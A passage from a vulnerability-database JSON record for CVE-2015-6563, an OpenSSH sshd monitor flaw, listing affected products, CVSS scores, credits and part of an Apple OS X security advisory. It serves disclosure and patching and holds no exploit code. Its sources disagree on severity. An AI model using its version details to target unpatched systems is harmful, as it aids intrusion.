0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.3" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.410" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.08" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.24" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.213" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.219" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3500-" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.113" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.6" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "10.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.22" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.7" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.22" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "nsm4000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.413" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v3700-" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v5000-" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.36" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.21" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "2.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.5" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "security privileged identity manager fixpack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.28" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v7000" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.46" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.34" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.26" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.415" }, { "model": "solaris sru", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.35.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.412" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "openssh", "scope": "ne", "trust": 0.3, "vendor": "openssh", "version": "7.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.9" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.2" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.09" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2015" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.218" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.6" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.42" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7.0" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.01" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" } ], "sources": [ { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "6.9", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-6563" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Moritz Jodeit", "sources": [ { "db": "BID", "id": "76317" }, { "db": "CNNVD", "id": "CNNVD-201508-115" } ], "trust": 0.9 }, "cve": "CVE-2015-6563", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.4, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Local", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 1.9, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-6563", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.4, "id": "VHN-84524", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:L/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-6563", "trust": 1.8, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201508-504", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-84524", "trust": 0.1, "value": "LOW" }, { "author": "VULMON", "id": "CVE-2015-6563", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. OpenSSH (OpenBSD Secure Shell) is a set of connection tools maintained by the OpenBSD project group for secure access to remote computers. This tool is an open source implementation of the SSH protocol, which supports encryption of all transmissions and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. \nA remote code execution vulnerability exists in OpenSSH. An attacker could use this vulnerability to execute arbitrary code in the context of an affected application and may cause a denial of service. Failed exploit attempts may result in denial-of-service conditions. There is a security vulnerability in the monitor component in the sshd of OpenSSH 6.9 and earlier versions based on non-OpenBSD platforms. The vulnerability is caused by the program incorrectly receiving the external username data in the MONITOR_REQ_PAM_INIT_CTX request. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update\n2015-007\n\nOS X El Capitan 10.11.1 and Security Update 2015-007 are now\navailable and address the following:\n\nAccelerate Framework\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in the Accelerate\nFramework in multi-threading mode. This issue was addressed through\nimproved accessor element validation and improved object locking. \nCVE-ID\nCVE-2015-5940 : Apple\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Multiple vulnerabilities in PHP\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.29 and 5.4.45. These were addressed by updating PHP to\nversions 5.5.29 and 5.4.45. \nCVE-ID\nCVE-2015-0235\nCVE-2015-0273\nCVE-2015-6834\nCVE-2015-6835\nCVE-2015-6836\nCVE-2015-6837\nCVE-2015-6838\n\nATS\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted webpage may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in ATS. This issue\nwas addressed through improved memory handling. \nCVE-ID\nCVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team\n\nAudio\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode\nDescription: An uninitialized memory issue existed in coreaudiod. \nThis issue was addressed through improved memory initialization. \nCVE-ID\nCVE-2015-7003 : Mark Brand of Google Project Zero\n\nAudio\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Playing a malicious audio file may lead to arbitrary code\nexecution\nDescription: Multiple memory corruption issues existed in the\nhandling of audio files. These issues were addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-5933 : Apple\nCVE-2015-5934 : Apple\n\nBom\nAvailable for: OS X El Capitan 10.11\nImpact: Unpacking a maliciously crafted archive may lead to\narbitrary code execution\nDescription: A file traversal vulnerability existed in the handling\nof CPIO archives. This issue was addressed through improved\nvalidation of metadata. \nCVE-ID\nCVE-2015-7006 : Mark Dowd of Azimuth Security\n\nCFNetwork\nAvailable for: OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to cookies\nbeing overwritten\nDescription: A parsing issue existed when handling cookies with\ndifferent letter casing. This issue was addressed through improved\nparsing. \nCVE-ID\nCVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of\nTsinghua University, Jian Jiang of University of California,\nBerkeley, Haixin Duan of Tsinghua University and International\nComputer Science Institute, Shuo Chen of Microsoft Research Redmond,\nTao Wan of Huawei Canada, Nicholas Weaver of International Computer\nScience Institute and University of California, Berkeley, coordinated\nvia CERT/CC\n\nconfigd\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to elevate privileges\nDescription: A heap based buffer overflow issue existed in the DNS\nclient library. \nCVE-ID\nCVE-2015-7015 : PanguTeam\n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in\nCoreGraphics. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5925 : Apple\nCVE-2015-5926 : Apple\n\nCoreText\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCoreText\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCoreText\nAvailable for: OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCoreText\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team\n\nDisk Images\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the parsing of\ndisk images. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-6995 : Ian Beer of Google Project Zero\n\nEFI\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: An attacker can exercise unused EFI functions\nDescription: An issue existed with EFI argument handling. This was\naddressed by removing the affected functions. \nCVE-ID\nCVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and\nSam Cornwell of The MITRE Corporation, coordinated via CERT/CC\n\nFile Bookmark\nAvailable for: OS X El Capitan 10.11\nImpact: Browsing to a folder with malformed bookmarks may cause\nunexpected application termination\nDescription: An input validation issue existed in parsing bookmark\nmetadata. This issue was addressed through improved validation\nchecks. \nCVE-ID\nCVE-2015-6987 : Luca Todesco (@qwertyoruiop)\n\nFontParser\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-5927 : Apple\nCVE-2015-5942\nCVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP\u0027s Zero\nDay Initiative\nCVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team\n\nFontParser\nAvailable for: OS X El Capitan 10.11\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team\n\nGrand Central Dispatch\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\nImpact: Processing a maliciously crafted package may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the handling of\ndispatch calls. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-6989 : Apple\n\nGraphics Drivers\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to cause unexpected system\ntermination or read kernel memory\nDescription: Multiple out of bounds read issues existed in the\nNVIDIA graphics driver. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-7019 : Ian Beer of Google Project Zero\nCVE-2015-7020 : Moony Li of Trend Micro\n\nGraphics Drivers\nAvailable for: OS X El Capitan 10.11\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-7021 : Moony Li of Trend Micro\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Processing a maliciously crafted image file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nparsing of image metadata. These issues were addressed through\nimproved metadata validation. \nCVE-ID\nCVE-2015-5935 : Apple\nCVE-2015-5938 : Apple\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: Processing a maliciously crafted image file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nparsing of image metadata. These issues were addressed through\nimproved metadata validation. \nCVE-ID\nCVE-2015-5936 : Apple\nCVE-2015-5937 : Apple\nCVE-2015-5939 : Apple\n\nIOAcceleratorFamily\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in\nIOAcceleratorFamily. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-6996 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: OS X El Capitan 10.11\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-6974 : Luca Todesco (@qwertyoruiop)\n\nKernel\nAvailable for: OS X Yosemite v10.10.5\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A type confusion issue existed in the validation of\nMach tasks. This issue was addressed through improved Mach task\nvalidation. \nCVE-ID\nCVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella\n\nKernel\nAvailable for: OS X El Capitan 10.11\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: An uninitialized memory issue existed in the kernel. \nThis issue was addressed through improved memory initialization. \nCVE-ID\nCVE-2015-6988 : The Brainy Code Scanner (m00nbsd)\n\nKernel\nAvailable for: OS X El Capitan 10.11\nImpact: A local application may be able to cause a denial of service\nDescription: An issue existed when reusing virtual memory. This\nissue was addressed through improved validation. \nCVE-ID\nCVE-2015-6994 : Mark Mentovai of Google Inc. \n\nlibarchive\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan 10.11\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: An issue existed within the path validation logic for\nsymlinks. This issue was addressed through improved path\nsanitization. \nCVE-ID\nCVE-2015-6984 : Christopher Crone of Infinit, 